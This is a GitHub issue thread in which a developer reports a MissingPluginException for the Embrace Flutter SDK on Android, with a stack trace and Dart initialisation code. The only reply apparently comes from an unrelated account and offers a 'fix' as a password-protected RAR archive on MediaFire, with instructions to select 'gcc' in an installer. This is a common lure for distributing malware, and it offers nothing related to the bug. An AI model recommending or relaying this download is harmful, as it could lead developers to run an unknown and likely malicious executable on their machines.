### ISSUE TITLE
[Android] `MissingPluginException` out of nowhere

### ISSUE THREAD

**Issue by ReubenTurner-esusu** [embrace-io/embrace-flutter-sdk#9]
**Description**
All of a sudden we are experiencing a `MissingPluginException`, for Android only - iOS is still behaving normally. Below is the error log:

```
I/[Embrace]( 9403): Fetched new config successfully.
E/flutter ( 9403): [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: MissingPluginException(No implementation found for method getSdkVersion on channel embrace)
E/flutter ( 9403): #0      MethodChannel._invokeMethod (package:flutter/src/services/platform_channel.dart:332:7)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #1      MethodChannelEmbrace.attachToHostSdk (package:embrace_platform_interface/method_channel_embrace.dart:130:39)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #2      _start (package:embrace/embrace.dart:459:3)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #3      bootstrap (package:consumers_mobile_app/bootstrap.dart:49:3)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #4      configureApp (package:consumers_mobile_app/main_development.dart:47:15)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #5      runConfiguredApp (package:consumers_mobile_app/main_development.dart:175:5)
E/flutter ( 9403): <asynchronous suspension>
E/flutter ( 9403): #6      main (package:consumers_mobile_app/main_development.dart:43:3)
E/flutter ( 9403): <asynchronous suspension>
```

We have read through the Embrace plugin code, and we see that there is indeed an implementation for `getSdkVersion`. So we are stumped as to what has caused this, as we did not change any code. 

We are operating on macOS 14.5 using Flutter version 3.22.2.

Our code to initialize Embrace looks like this:
```dart
Future<Widget> bootstrap(FutureOr<Widget> Function() builder) async {
  late Widget app;
  await Embrace.instance.start(
    () async {
      WidgetsFlutterBinding.ensureInitialized();
      // Non-relevant init code here

      Bloc.observer = AppBlocObserver();

      app = await builder();
      listenFirebaseMessagingToken();
      final fcmToken = await FirebaseMessaging.instance.getToken();
    },
  );
  return app;
}
```
It is called in main like so:
```dart
Future<void> main() async {
  await runConfiguredApp();
}

Future<void> runConfiguredApp() async {
  runApp(
    await configureApp(),
  );
}

Future<Widget> configureApp() async {
  final app = await bootstrap(() async {
    // other non-relevant init code here
  });

  return app;
}
```

As mentioned above, this code works on iOS still, and has not changed recently. 

We would really appreciate prompt assistance with this, as it is a blocking issue for the Android version of our app. Thanks!

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
